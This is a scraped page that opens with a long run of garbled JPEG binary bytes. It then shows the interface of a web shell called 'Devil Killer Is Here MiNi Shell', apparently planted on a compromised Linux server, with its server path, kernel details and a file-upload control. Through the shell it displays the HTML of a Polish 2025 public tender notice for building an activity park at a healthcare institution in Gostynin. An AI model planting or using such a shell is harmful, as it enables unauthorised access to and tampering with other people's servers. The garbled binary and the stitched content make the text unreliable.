JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250724/0034407601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zalesiański Park Aktywności </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Samodzielny Zespół Publicznych Zakładów Opieki Zdrowotnej im. prof. Eugeniusza Wilczkowskiego w Gostyninie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000291724</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zalesie 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gostynin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 236 00 35</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@spzoz-zalesie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spzoz-zalesie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zalesiański Park Aktywności </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2267fa34-946c-4cf3-b3c9-df2097387ece</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00344076</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00111633/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Zalesiański Park Aktywności</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2267fa34-946c-4cf3-b3c9-df2097387ece <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W post o udziel zam kom między<br/>zam, a wyk odbywa się drogą elektr przy użyciu Platformy e-Zamówienia https://ezamowienia.gov.pl lub poczty elektr<br/>zamowienia@spzoz-zalesie.pl. 2. Korz z Platformy e-Zamowienia jest bezpłatne.<br/>3. Wyk zamierzający wziąć udział w post o udz zam publ musi posiadać konto podmiotu „Wyk” na Platf e-Zamowienia. Szczeg info<br/>na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamowienia określa Regn Platformy<br/>eZamowienia, dostępny na str inter https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. 4.<br/>Przegl i pobieranie publicznej treści dokumentacji post nie wymaga posiadania konta na Platformie e-Zamowienia ani logowania. 5.<br/>Sposób sporządzania i przekazywania dok elektr lub dok elektr będących kopią elektr treści zapisanej w postaci pap (cyfr<br/>odwzorowania) musi być zgodny z wymaganiami określonymi w rozp Prezesa Rady Ministrów z 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przek info oraz wymagań tech dla dok elektro oraz środków kom elektro w post o udz zam pub lub konkursie<br/>(zw. Dalej Rozporządzenie w spr wym dla dok elektro). 6. Dok elektro, o których mowa w § 2 ust. 1 Rozp Prezesa Rady Ministrów w<br/>spr wym dla dok elektro, sporządza się w postaci elektro, w formatach danych okr w przepisach Rozp Rady Ministrów z dnia 12<br/>kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, min wymagań dla rejestrów publ i wymiany info w postaci elektro oraz<br/>mini wymagań dla systemów teleinfo (zw. dalej „Rozporządzeniem w sprawie Krajowych Ram Interoperacyjności”), z uwzgl rodzaju<br/>przek danych i przekazuje się jako załi. W przypadku formatów, o których mowa w art. 66 ust. 1 u.p.z.p., ww. regulacje nie będą<br/>miały bezpośro zast. 7. Info, ośw lub dok, inne niż wym w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dok elektro, przek w<br/>post sporządza się w post elektroj: 1) w formatach danych określ w przepisach Rozporządzenia w spr Krajowych Ram<br/>Interoperacyjności (i przekazuje się jako załącznik), lub 2) jako tekst wpisany bezp do wiadomości przek przy użyciu środków komu<br/>elektr (np. w treści „Formularza do komunikacji”).<br/>8. Komu w post, z wył skł ofert, odbywa się drogą elektr za pośrednictwem formularzy do kom dos w zakładce „Formularze”<br/>(„Formularze do kom”). Za pośr „Formularzy do kom” odbywa się w szcz przek wezwań, zawiadomień, zadawanie pyt. Form do kom<br/>umożliwiają również doł zał do przesyłanej wiadi („dodaj zał”). We wszelkiej korespondencji zw z nin post zamawiający i wyk<br/>posługują się nr ref - SZP.26.5.2025.TP.MJ.PG 9. W przyp zał, które są zgodne z u.p.z.p. lub Rozp w spr wym dla dok elektr, opatrzone<br/>kwal pod elektr, podpisem zaufanym lub pod os, mogą być opatrzone pod typu zew lub wew. W zal od rodz pod i jego typu (zew,<br/>wew) dod się uprzednio pod dok wraz z wygenerowanym plikiem pod (typ zew) lub dok z wszytym pod(typ wew). 10. Możliwość<br/>korzystania w post z „Formularzy do kom w pełnym zakr wym posiadania konta „Wyk” na Platformie e-Zamowienia oraz zal się na<br/>Platf e-Zamowienia. Do korzystania z „Formularzy do komunikacji” służących do zad pyt dot treści dok zam, wyst jest posiadanie<br/>tzw. konta uproszczonego na Platformie e-Zamowienia. 11. Wszelkie wys i odebrane w post przez Wy wiad, widoczne są po zal w<br/>podglądzie post w zak „Komunikacja”. 12. Maks rozmiar plików przesyłanych za pośr „Formularzy do kom” wynosi 150 MB (wielkość<br/>ta dot plików przesyłanych jako zał do jednolitego form). 13. Min wym tech dot sprzętu używanego w celu korzyst z usług Platformy<br/>e-Zamowienia oraz info dot specy poł określa Reg Platf e-Zamowienia. 14. W przypadku problemów tech awarii zw z<br/>funkcjonowaniem Platformy e-Zamowienia, użyt mogą skorzystać z wsparcia tech dostępnego pod num tel 22/ 458 77 99 lub drogą<br/>elektropoprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Wojewódzkiego Samodzielnego Zespołu Publicznych Zakładów Opieki Zdrowotnej im. prof. Eugeniusza Wilczkowskiego w Gostyninie, ul. Zalesie 1, 09-500 Gostynin. <br/>2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119 z 4/05/2016 r, str. 1), dalej &#34;RODO&#34;, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wojewódzki Samodzielny Zespół Publicznych Zakładów Opieki Zdrowotnej im. prof. Eugeniusza Wilczkowskiego w Gostyninie, ul. Zalesie 1, 09-500 Gostynin tel. 24/2360000, e-mail: sekretariat@spzoz-zalesie.pl.<br/>2) Inspektorem ochrony danych osobowych w Wojewódzkim Samodzielnym Zespole Publicznych Zakładów Opieki Zdrowotnej w Gostyninie, ul. Zalesie 1 jest Pan Marek Malczewski, dane kontaktowe: tel. 24/236 00 23, adres poczty elektronicznej: iod@spzoz-zalesie.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego dla projektu pn „Zalesiański Park Aktywności”.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja przetargowa postępowania w oparciu o art. 18 ust. 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późń. zm.), dalej: u.p.z.p.,<br/>5) ponadto dane mogą być przekazywane podmiotom przetwarzającym dane osobowe na zlecenie Administratora i ich upoważnionym pracownikom, przy czym takie podmioty przetwarzają dane na podstawie umowy z nami wyłącznie zgodnie z przepisami w zakresie ochrony danych osobowych oraz pod warunkiem zachowania poufności,<br/>6) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 u.p.zp., przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, z zastrzeżeniem, że dokumentacja techniczna będzie przechowywana przez okres przez okres 5 lat od dnia zakończenia eksploatacji studni i instalacji,<br/>7) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio dotyczących Pani/Pana jest wymogiem ustawowym określonym w przepisach u.p.zp., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z u.p.z.p.;<br/>8) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>9) posiada Pani/Pan:<br/>a) na podstawie art.15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art.16 RODO prawo do sprostowania Pani/Pana danych osobowych1;<br/>c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art 18 ust. 2 RODO2, <br/>10) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>11) nie przysługuje Pani/Panu:<br/> a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż <br/> podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.26.5.2025.TP.MJ.PG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest wykonanie robót budowlanych (dalej: roboty), polegających budowie małej architektury wraz z rozbudową wewnętrznej instalacji wodociągowej i elektrycznej, budowie altany rekreacyjnej, budowie tężni solankowo-słupowej wraz z infrastrukturą towarzyszącą na działce o nr ewidencyjnym 6721/3, Obręb: 0001 Gostynin, Nr księgi wieczystej: KW PL1G/00043843/0 – nieruchomość będąca w użytkowaniu Wojewódzkiego Samodzielnego Zespołu Publicznych Zakładów Opieki Zdrowotnej im. Profesora Eugeniusza Wilczkowskiego w Gostyninie – akt notarialny Repertorium A – 12815/2007 Kancelaria Notarialna Maria Alicja Janowska, ul. Nowolipki 27B, lok. 3, 01-010 Warszawa, stanowiąca własność Samorządu Województwa Mazowieckiego adres: Urząd Marszałkowski Województwa Mazowieckiego, ul. Jagiellońska 26, 03-719 Warszawa.<br/>2. Przedmiot niniejszego zamówienia, o którym mowa w ust. 1 tego Rozdziału, obejmuje wykonanie robót budowlanych określonych w dokumentacji projektowej, w szczególności:<br/> 1) budowę altany rekreacyjnej;<br/> 2) budowę tężni solankowej jedno-słupowej wraz z infrastrukturą towarzyszącą;<br/> 3) utwardzenie ciągów pieszych;<br/> 4) dostawa i montaż koszy na śmieci w ilości – 7 kpl;<br/> 5) dostawa i montaż ławek parkowych w ilości – 7 kpl;<br/> 6) dostawa i montaż leżaków betonowych w ilości – 4 kpl;<br/> 7) dostawa i montaż tablic interaktywnych dla dzieci – 4 kpl;<br/> 8) dostawa i montaż tablic informacyjnych z regulaminem – 1 kpl;<br/> 9) przeniesienie istniejących tablic informacyjnych – 2 kpl;<br/> 10) dostawa i montaż tablicy ze znakiem STOP – 1 kpl;<br/> 11) nasadzenie zieleni, w tym przygotowanie podłoża;<br/> 12) pielęgnacja istniejących drzew;<br/> 13) instalacje elektryczne;<br/> 14) instalacje sanitarne.<br/>3. Celem realizacji projektu, o którym mowa w ust. 1-2 tego Rozdziału, jest utworzenie Zalesiańskiego Parku Aktywności, który wpłynie na poprawę terapii poprzez kontakt z przyrodą.<br/>Przedmiot niniejszego zamówienia, o którym mowa w ust. 1 i ust. 2 tego Rozdziału, należy wykonać z należytą starannością, właściwymi przepisami w zakresie realizacji robót, obowiązującymi normami, warunkami technicznymi, przepisami bhp, zgodnie z postanowieniami tej umowy, wymaganiami określonymi w niniejszej SWZ wraz z całą zawartością, z wyłączeniem załączników nr 2-11 i 13, opisie oferty i dokumentacji projektowej, które stanowią integralną część tej SWZ, specyfikacją techniczną wykonania i odbioru robót, dalej: STWiORB, warunkami zgłoszenia oraz z zasadami wiedzy i sztuki budowlanej i przepisami ustawy z 07 lipca 1994 r. – Prawo budowlane (Dz. U. z 2025 r. poz. 418) dalej: u.p.b. i przepisami wykonawczymi do tej ustawy i innymi przepisami dotyczącymi realizacji robót budowlanych, w tym przepisami techniczno-budowlanymi, obowiązującymi normami, z zachowaniem najwyższej staranności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <p class="mb-0">45212130-6 - Roboty budowlane w zakresie parków rozrywki</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233260-9 - Roboty budowlane w zakresie dróg pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający porówna i oceni na podstawie kryteriów merytorycznych, o których mowa<br/>w niniejszym rozdziale, jedynie oferty nie odrzucone.<br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>Cena	(brutto) – 60%<br/>Okres gwarancji	– 40%<br/><br/> 1) CENA (brutto)	-	60<br/> Oferta z najniższą ceną otrzyma maksymalną ilość punktów – 60. Pozostałe oferty zostaną przeliczone wg poniższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty. Ocena wartości ceny oferty jest obliczana według przedstawionego wzoru:<br/> <br/> C min<br/> C = -------------- x maksymalna liczba punktów<br/> C of<br/> C min -	cena minimalna/ najniższa cena oferty nie podlegająca odrzuceniu<br/> C of	-	cena oferowana/ cena oferty badanej<br/> Maksymalna liczba punktów	-	60<br/><br/><br/> 2) Okres gwarancji	– 40 <br/> <br/> Maksymalna liczba punktów, jaką może otrzymać wykonawca wynosi 40 punktów.<br/> Ocena kryterium okresu gwarancji zawartego w ofercie jest obliczana według wskazanej poniżej punktacji.<br/> - gwarancja 36 m-cy – 0 pkt<br/>	- gwarancja 48 m-cy – 20 pkt<br/> - gwarancja 60 m-cy – 40 pkt<br/>Zaoferowany przez Wykonawców okres gwarancji na przedmiot niniejszego zamówienia nie może być krótszy niż 36 miesięcy.<br/>Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego (warunek konieczny) – 36 miesięcy. Jeżeli Wykonawca w formularzu oferty nie wypełni zobowiązania dotyczącego okresu gwarancji, Zamawiający uzna, że okres gwarancji został udzielony na 36 miesiące. Całkowity okres gwarancji należy podać w miesiącach.<br/>Oferta z maksymalnym okresem gwarancji 60 m-cy otrzyma 40 punktów.<br/> Każdy kolejny rok nie spowoduje zwiększenia ilości przyznanych punktów.<br/><br/>3) Ocena końcowa oferty to suma punktów uzyskanych za kryterium Ceny i Gwarancji. Maksymalna liczba punktów do uzyskania po zsumowaniu wszystkich kryteriów: 100.<br/>4) Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.<br/>5) W sytuacji, gdy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie przedłoży na wezwanie Zamawiającego stosownych dokumentów, na skutek czego zostanie on wykluczony z postępowania lub jego oferta zostanie odrzucona, Zamawiający dokona ponownej oceny ofert wraz z przeliczeniem punktacji w ramach kryteriów oceny ofert i wezwie kolejnego Wykonawcę, którego oferta została oceniona jako najkorzystniejsza, do złożenia stosownych dokumentów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale XIV SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w 